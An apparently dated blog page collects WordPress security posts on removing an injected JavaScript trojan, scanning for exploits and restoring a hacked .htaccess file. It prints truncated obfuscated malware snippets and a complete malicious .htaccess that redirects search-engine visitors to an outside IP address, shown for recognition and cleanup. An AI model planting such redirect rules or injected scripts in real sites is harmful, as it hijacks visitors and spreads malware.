Blog and SEO tips to help you make money blogging » Security tips

How to clean JS/TrojanDownloader.Iframe.NHU trojan

admin — Sun, 09 May 2010 21:32:36 +0000

Just a week ago I had many problems with my blog. Seems like it was hacked or infected with malware/badware. And it was the first time I have had so many problems with it. Every time I tried to open my website ESET Nod32 blocked pages from loading. I could not even edit any WordPress file using Cute FTP professional. I had to find a solution to clean my blog so I will give you several tips how to clean your infected website (mostly Wordpress blogs).

Almost all WordPress files were infected. I have downloaded them all and scanned with Anti Virus software.

All infected files were .php and .html only and if you take a look at the code of the original file and infected one you will see that there is an added code/virus.

Virus code

< script type=”text/javascript”>eval(String.fromCharCode(118,97…50,55))

Also some files were infected with this code:

< !– ad –>< script>function ixtdoyiepvo..cygw3E”.replace(/sqncygw/g, “”));< !– /ad –>

Virus removal

You may remove the virus from your site by deleting the codes mentioned above. You will have to clean all WordPress files but it takes time and requires your attention. I have deleted all files via FTP and uploaded the new ones. I also checked all HTML and PHP files. The easiest way is to delete old files and upload the new ones.Remember to check all folders under domain name.

Do not forget to check all your files manually to be sure that all files are clean. Also recheck your .htaccess file if it is not corrupted. I do not know how this the website was infected but i offer to change your ftp password as well.

Exploit scanner for Wordpress

admin — Wed, 04 Nov 2009 20:44:13 +0000

Security of the blog is really important but what do we do to protect our blogs? Almost nothing. You can be penalized by Google by linking to bad Website or blog. To avoid this, bloggers use Akismet plugin. I agree that it helps but my opinion is that it is not 100% secure.

Well, I have written about tips to secure a blog from hackers. But today I would like to write more about the blog’s security because no one wants to lose a blog. I have been navigating through the plugins directory and found very useful plugin that searches for anything suspicious on your Website, blog. It also examines list of active plugins for something unusual. This plugin is called Wordpress exploit scanner. So if you want to scan your blog feel free to use it.

Hacked and default .htaccess file in wordpress

admin — Mon, 26 Jan 2009 08:41:05 +0000

If a blog is working fine you have a default .htaccess file which is located in yourblog.com and should look like this:

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

You just need to make a copy of .htaccess file for the future. Any Trojan injection or hack attempt can modify Blog’s .htaccess file. After modification the file should look like this (hacked .htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://89.28.13.208/join.html?s=join [R,L]

When you blog’s .htaccess file is modified your blog’s URL is redirected to another web Site. Well, to avoid this it is necessary to keep your computer clean from viruses and Trojans. I have made a copy of this file and when I notice that my blog’s .htaccess file is corrupted I just delete it and upload the new one. I have noticed that when my Blog’s .htaccess file is changed I always find a virus named w32/Injector.HW Trojan in my computer. Keeping your computer clean can help you to avoid this problem. By the way, if this file is corrupted you will get error 404 – not foud message after clicking and any link or post in your wordpress blog.

Protect your blog from being blocked by Google

admin — Mon, 12 Jan 2009 19:54:19 +0000

Securing your blog is the most important and no one should forget it. Bloggers try to submit their blogs to search engines to get more traffic. Google is the most popular search engine so we have to do everything to befriends with them.
Well, my post is about getting blocked or restricted by Google. Every blogger try to make some extra money. They use various ways to make money. It can be advertising, writing reviews, selling links and so on. Also there is a way to make money when you do not need to do anything. Just place a HTML code and get paid for visitors. It is called CPM (cost per impressions). Sounds great but it can bring you trouble. There are several Websites that are identified as bad (badware, malware) sites. If you do not want to be blocked by Google try not to use suspicious websites. One of the sites is neoffic[.]com. If you place the code you are blocked by Google. Try to keep your Website clean. Do not upload any malicious software, do not place bad codes.
Well, if you have any problems about that try to remove malicious code from your site. Then log in to your webmasters account and ask Google to review your web site. If you do nothing you are blocked forever.

Fixing .htaccess file in wordpress

admin — Mon, 12 Jan 2009 17:50:53 +0000

In the last month i had so many problems with my blog. And the main problem was (is) error 404 – not found. A problem is that when you click on any link in a blog you get a message saying that it is not found.
It looks like a blog is blocked from search engines. Actually it is not but people cannot find your content and visit your blog. The only working link is a Home page (domain.com). I have written several articles about this problem and how to fix it. That may help you. First post is about fixing .htaccess file in wordpress. The second is about removing malware from your computer. This is very important step so do not skip it. Just download the latest Malwarebytes version update it and clean your PC. Do not forget to change your FTP passwords.
Well, I have done all this but still had this problem. I have talked to specialists and I found a solution. They didn’t fix it for me. Just said to clean PC, create a .htaccess file. So if your computer is clean and passwords are changed you can go to next step.
And the next step is to delete corrupted .htaccess file from your domain. The best way is to have a backup file but if you don’t have it you need to create one. I have a working .htaccess file.
These lines are inserted in that file so you can do the same to have it working.

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

And if you have problems with your .htaccess file you need to upload a new one. Do not forget to delete corrupted one. Just use FTP software to upload it. Rename your file to 1.htaccess. upload it to your domain and remove 1, rename it to .htaccess file. Now your wordpress should be working fine.